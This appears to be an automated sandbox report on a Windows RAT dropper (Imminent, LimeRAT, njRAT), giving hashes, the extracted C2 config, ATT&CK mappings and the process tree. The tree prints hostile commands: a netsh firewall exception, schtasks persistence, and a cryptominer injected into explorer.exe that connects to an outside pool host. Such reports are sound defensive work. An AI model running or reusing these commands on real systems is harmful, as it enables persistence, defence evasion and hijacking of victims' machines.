imminent | 46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31

Analysis

max time kernel
149s
max time network
150s
platform
windows7_x64
resource
win7-20240419-en
resource tags

arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
submitted
26-04-2024 20:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
Size

24.3MB
MD5

018e93f66899228a3e980f8fa671c021
SHA1

76c9e359cf572757ba0bf5e372de1780f5fbae05
SHA256

46141664081fd940edcf0db0adcd081736a3bd5e2f9639037fc598e558104b31
SHA512

1804d279136feda7c468c63486d15e1b57f1c028d7e926cb733bf8f7c2c7d4b5b3506457b282393182cdcc7a71966b2ba9148d7b8f473a7367bace2b680b0056
SSDEEP

393216:d0pgWC+4cw08gMka47tPxDKdUU7K9HuNW7BqTOjDtXLEc3uoTHn:ZXjcCtkJPxkn8uw7Bq8X82n

Score

10^/10

imminent limerat njrat evasion persistence rat spyware trojan

Malware Config

Extracted

Family

limerat

Wallets

1JBKLGyE6AnRGvk92A8x3m8qmXfh3fcEty

Attributes

aes_key
nulled
antivm
true
c2_url
https://pastebin.com/raw/cXuQ0V20
delay
3
download_payload
false
install
false
install_name
Winservices.exe
main_folder
AppData
pin_spread
false
sub_folder
\
usb_spread
true

Signatures

Imminent RAT
Remote-access trojan based on Imminent Monitor remote admin software.
trojan spyware imminent
LimeRAT
Simple yet powerful RAT for Windows machines written in .NET.
rat limerat
njRAT/Bladabindi
Widely used RAT written in .NET.
trojan njrat

Modifies Windows Firewall 2 TTPs 1 IoCs

evasion

Windows Service

T1543.003

Disable or Modify System Firewall

T1562.004

pid	Process
1128	netsh.exe

Executes dropped EXE 13 IoCs

pid	Process
2580	Ccleaner.exe
2672	cleaner.exe
2508	Torrent.exe
2636	μTorrent.exe
2936	Project1.exe
2960	NetFramework.exe
592	NetFramework.exe
2724	data.exe
2432	sdchange.exe
980	djoin.exe
820	data.exe
2428	sdchange.exe
2272	djoin.exe

Loads dropped DLL 36 IoCs

pid	Process
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
2636	μTorrent.exe
2508	Torrent.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe"	μTorrent.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-481678230-3773327859-3495911762-1000\Software\Microsoft\Windows\CurrentVersion\Run\NetFramework.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\NetFramework.exe"	Torrent.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs

Web Service

T1102

flow	ioc
7	pastebin.com
16	pastebin.com
23	pastebin.com
30	pastebin.com
39	pastebin.com
48	pastebin.com
58	pastebin.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
2	api.ipify.org

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	RegAsm.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	RegAsm.exe

AutoIT Executable 5 IoCs

AutoIT scripts compiled to PE executables.

resource	yara_rule
behavioral1/files/0x000b000000012279-2.dat	autoit_exe
behavioral1/files/0x0034000000016126-28.dat	autoit_exe
behavioral1/files/0x00060000000175f7-236.dat	autoit_exe
behavioral1/files/0x0008000000016d7d-237.dat	autoit_exe
behavioral1/files/0x0007000000016c57-239.dat	autoit_exe

Suspicious use of SetThreadContext 10 IoCs

description	pid	Process	procid_target
PID 2672 set thread context of 2744	2672	cleaner.exe	30
PID 2956 set thread context of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2960 set thread context of 1996	2960	NetFramework.exe	44
PID 592 set thread context of 2600	592	NetFramework.exe	46
PID 2580 set thread context of 1108	2580	Ccleaner.exe	52
PID 2432 set thread context of 2160	2432	sdchange.exe	61
PID 980 set thread context of 2488	980	djoin.exe	64
PID 2724 set thread context of 2796	2724	data.exe	67
PID 2428 set thread context of 2808	2428	sdchange.exe	73
PID 2272 set thread context of 2224	2272	djoin.exe	76

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2504	schtasks.exe
292	schtasks.exe
2344	schtasks.exe
1840	schtasks.exe
2592	schtasks.exe
2828	schtasks.exe
2920	schtasks.exe
2012	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2508	Torrent.exe
2508	Torrent.exe
2508	Torrent.exe
2636	μTorrent.exe
2636	μTorrent.exe
2636	μTorrent.exe
2776	RegSvcs.exe
2776	RegSvcs.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

pid	Process
2936	Project1.exe
2776	RegSvcs.exe
1304	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	2636	μTorrent.exe
Token: SeDebugPrivilege	2508	Torrent.exe
Token: SeDebugPrivilege	2776	RegSvcs.exe
Token: SeDebugPrivilege	1304	taskmgr.exe
Token: SeDebugPrivilege	2960	NetFramework.exe
Token: SeDebugPrivilege	592	NetFramework.exe
Token: SeDebugPrivilege	2744	RegAsm.exe
Token: SeDebugPrivilege	2744	RegAsm.exe
Token: 33	2776	RegSvcs.exe
Token: SeIncBasePriorityPrivilege	2776	RegSvcs.exe
Token: SeLockMemoryPrivilege	2600	explorer.exe
Token: SeLockMemoryPrivilege	1996	explorer.exe
Token: SeLockMemoryPrivilege	2600	explorer.exe
Token: SeLockMemoryPrivilege	1996	explorer.exe
Token: SeDebugPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe
Token: 33	1108	RegAsm.exe
Token: SeIncBasePriorityPrivilege	1108	RegAsm.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe
1304	taskmgr.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2936	Project1.exe
2936	Project1.exe
2936	Project1.exe
2776	RegSvcs.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2956 wrote to memory of 2580	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	28
PID 2956 wrote to memory of 2580	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	28
PID 2956 wrote to memory of 2580	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	28
PID 2956 wrote to memory of 2580	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	28
PID 2956 wrote to memory of 2672	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	29
PID 2956 wrote to memory of 2672	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	29
PID 2956 wrote to memory of 2672	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	29
PID 2956 wrote to memory of 2672	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	29
PID 2956 wrote to memory of 2508	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	31
PID 2956 wrote to memory of 2508	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	31
PID 2956 wrote to memory of 2508	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	31
PID 2956 wrote to memory of 2508	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	31
PID 2956 wrote to memory of 2636	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	32
PID 2956 wrote to memory of 2636	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	32
PID 2956 wrote to memory of 2636	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	32
PID 2956 wrote to memory of 2636	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	32
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2672 wrote to memory of 2744	2672	cleaner.exe	30
PID 2956 wrote to memory of 2936	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	33
PID 2956 wrote to memory of 2936	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	33
PID 2956 wrote to memory of 2936	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	33
PID 2956 wrote to memory of 2936	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	33
PID 2672 wrote to memory of 292	2672	cleaner.exe	34
PID 2672 wrote to memory of 292	2672	cleaner.exe	34
PID 2672 wrote to memory of 292	2672	cleaner.exe	34
PID 2672 wrote to memory of 292	2672	cleaner.exe	34
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2776	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	36
PID 2956 wrote to memory of 2344	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	37
PID 2956 wrote to memory of 2344	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	37
PID 2956 wrote to memory of 2344	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	37
PID 2956 wrote to memory of 2344	2956	018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe	37
PID 2636 wrote to memory of 2960	2636	μTorrent.exe	40
PID 2636 wrote to memory of 2960	2636	μTorrent.exe	40
PID 2636 wrote to memory of 2960	2636	μTorrent.exe	40
PID 2508 wrote to memory of 592	2508	Torrent.exe	41
PID 2508 wrote to memory of 592	2508	Torrent.exe	41
PID 2508 wrote to memory of 592	2508	Torrent.exe	41
PID 2776 wrote to memory of 1304	2776	RegSvcs.exe	42
PID 2776 wrote to memory of 1304	2776	RegSvcs.exe	42
PID 2776 wrote to memory of 1304	2776	RegSvcs.exe	42
PID 2776 wrote to memory of 1304	2776	RegSvcs.exe	42
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 2960 wrote to memory of 1996	2960	NetFramework.exe	44
PID 592 wrote to memory of 2600	592	NetFramework.exe	46

C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\018e93f66899228a3e980f8fa671c021_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2956
- C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2580
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1108
  - - C:\Windows\SysWOW64\netsh.exe
      netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE
      4⤵
      Modifies Windows Firewall
      PID:1128
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:1840
- C:\Users\Admin\AppData\Local\Temp\cleaner.exe
  "C:\Users\Admin\AppData\Local\Temp\cleaner.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2672
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    - Maps connected drives based on registry
    - Suspicious use of AdjustPrivilegeToken
    PID:2744
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:292
- C:\Users\Admin\AppData\Local\Temp\Torrent.exe
  "C:\Users\Admin\AppData\Local\Temp\Torrent.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
    "C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:592
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:2600
- C:\Users\Admin\AppData\Local\Temp\μTorrent.exe
  "C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Adds Run key to start application
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2636
- - C:\Users\Admin\AppData\Local\Temp\NetFramework.exe
    "C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2960
  - - C:\Windows\explorer.exe
      C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1996
- C:\Users\Admin\AppData\Local\Temp\Project1.exe
  "C:\Users\Admin\AppData\Local\Temp\Project1.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of SetWindowsHookEx
  PID:2936
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2776
- - C:\Windows\SysWOW64\taskmgr.exe
    "C:\Windows\System32\taskmgr.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:1304
- C:\Windows\SysWOW64\schtasks.exe
  "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
  2⤵
  - Creates scheduled task(s)
  PID:2344

C:\Windows\system32\wbem\WmiApSrv.exe
C:\Windows\system32\wbem\WmiApSrv.exe
1⤵
PID:2400

C:\Windows\system32\taskeng.exe
taskeng.exe {6B93570C-C3B1-4C28-810E-C9A55839F459} S-1-5-21-481678230-3773327859-3495911762-1000:UIBNQNMA\Admin:Interactive:[1]
1⤵
PID:1656
- C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
  C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2724
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:2796
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2920
- C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
  C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:980
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:2488
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2828
- C:\Users\Admin\secinit\sdchange.exe
  C:\Users\Admin\secinit\sdchange.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2432
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:2160
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2592
- C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
  C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe
  2⤵
  - Executes dropped EXE
  PID:820
- C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
  C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2272
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
    3⤵
    PID:2224
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2504
- C:\Users\Admin\secinit\sdchange.exe
  C:\Users\Admin\secinit\sdchange.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:2428
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"
    3⤵
    PID:2808
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F
    3⤵
    - Creates scheduled task(s)
    PID:2012

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\Project1.exe

Filesize
6.7MB

MD5
1166591fc5f77c463d176bcca574efff

SHA1
35d710b8983945aaf8c39d289fd6c73ed1f00b65

SHA256
a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad

SHA512
751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

Download Submit
C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

Filesize
1.1MB

MD5
c8ef1b359a5585af85da2cc6d32d44af

SHA1
2da8ede6a4292d8ac9ff26c7ebc07095cb873432

SHA256
6ca5985e0483ad3299993e6b659d441928fdbb7f5a12f65f4fc01ee65ac1a1d3

SHA512
b8a7b1e0ea23fb3ca89d17f82174e728108e16b051217798a8222130238f6938e6eab8858d023346a2690b11e16082364594d36055db7f6daa72dbbcc8d91c26

Download Submit
C:\Users\Admin\AppData\Local\Temp\Torrent.exe

Filesize
6.9MB

MD5
cedb1319e9cbd45f4cc69e58699009d3

SHA1
